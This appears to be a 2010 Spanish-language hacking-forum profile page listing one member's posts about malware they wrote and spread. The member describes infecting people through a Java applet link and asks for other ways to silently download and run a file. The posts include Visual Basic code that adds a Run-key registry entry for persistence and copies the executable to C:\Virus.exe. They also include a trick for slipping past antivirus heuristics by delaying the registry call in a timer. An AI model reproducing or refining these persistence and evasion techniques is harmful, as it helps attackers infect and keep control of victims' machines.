| |
|
51
|
Programación / Desarrollo Web / programacion facebook
|
en: 10 Octubre 2010, 04:49 am
|
|
Buenas hermanos, tengo una duda.
En esta sección se puede preguntar acerca de programacion en facebook?
Si no es asi, algun moderador borre mi mensaje.
gracias!
(Dependiendo de la respuesta hare la siguiente pregunta, gracias!)
|
|
|
|
|
55
|
Seguridad Informática / Hacking / Downloader, metodo de propagacion, ayuda...
|
en: 26 Septiembre 2010, 06:10 am
|
|
Buen dia para todos, con este post dare mi cara mas lammer que pueda dar pero aun asi espero que me puedan ayudar a orientarme.
No estoy buscando que me revelen un codigo ni mucho mas, pero si que me ayuden a retomar el interes y que me digan si lo que busco existe actualmente.
Actualmente como metodo de infeccion para un malware que desarrolle uso el java applet que anda en esta misma sección, va bien siempre y cuando se tenga instalado java y como me he dado cuenta es un % minimo el que usa Java en sus exploradores.
Entonces mi pregunta es.... Existe otro buen metodo de infeccion? como %(/%$&·$& hacer que desde un link se pueda descargar y ejecutar un archivo de modo invisible?
Ahora, quiero que los expertos me digan "si se puede", algo que me regrese las ganas de seguir buscando en google.
En fin, gracias a los que tuvieron la paciencia de leer esto.
saludos!
|
|
|
|
|
56
|
Seguridad Informática / Hacking / Re: [POC] Infección Mediante Java Applet (y VBScript)
|
en: 11 Septiembre 2010, 14:56 pm
|
|
Pues aqui me encuentro reviviendo este tema para preguntar si existe alguna mejoria en el codigo o si alguien ha pensado algo diferente.
Yo estuve usando este code por mas de 1 año y me iba muy bien pero de un tiempo para aca las infecciones disminuyeron y compartiendo el enlace de infeccion con varios compañeros del hack me comentaban que no les cargaba el applet, o algunos no tenian java y a otros mas si les cargaba el applet pero no se descargaba el archivo.
Alguna experiencia de ustedes?
|
|
|
|
|
58
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Problema con la Heuristica en Visual Basic.
|
en: 8 Julio 2010, 11:17 am
|
|
Buenas, ahora tengo ua nueva duda....
Modificando el codigo de un viejo malware q habia escrito hace tiempo me di cuenta que era detectado por mi AV (el avira) fui quitando funciones para ver cual era la chismosita hasta que llegue a dejar el form vacio!!!!!!
y seguia cantando, entonces deje el proyecto sin form...... Y SEGUIA CANTANDO!
Llego a la conclusion que alguna propiedad del proyecto esta cantando :S la verdad me quede sin opciones por mas que trato de regresar el proyecto a los valores predeterminados sigue saltando mi antivirus como "troyan gen downloader" una cosa asi.
Cosa rara porque al hacer un proyecto desde cero no ocurre lo mismo.
Alguien me puede orientar?
|
|
|
|
|
59
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Problema con la Heuristica en Visual Basic.
|
en: 7 Julio 2010, 22:36 pm
|
Gracias por sus respuestas. Por cierto lo del nombre del archivo (Virus) fue solo un ejemplo jejeje. Di con la solucion colocando este codigo: Call remember(&H80000001, "Software\Microsoft\Windows\CurrentVersion\Run", "Virus", "C:\Virus.exe")
en un timer... y ese timer en un principio estaria desactivado y una funcion lo activaria. Asi aparece Clean en novirusthanks.org  |
|
|
|
|
60
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Problema con la Heuristica en Visual Basic.
|
en: 7 Julio 2010, 22:18 pm
|
Call remember(&H80000001, "Software\Microsoft\Windows\CurrentVersion\Run", "Virus", "C:\Virus.exe")
Public Function remember(hKey As Long, strPath As String, strValue As String, strdata As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(hKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, 1, ByVal strdata, Len(strdata))
r = RegCloseKey(keyhand)
End Function
Public Function Mitosis()
If App.Path = StrReverse("\:c") Then
Exit Function
Else
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\Virus.exe"
End
End If
End Function
Estos son los codigos q uso, pero por mas que lo modifico no funciona. |
|
|
|
|
|
| |
|
Mostrar Mensajes
aumentara unos cuantos kb de espacio pero ahora va calladito.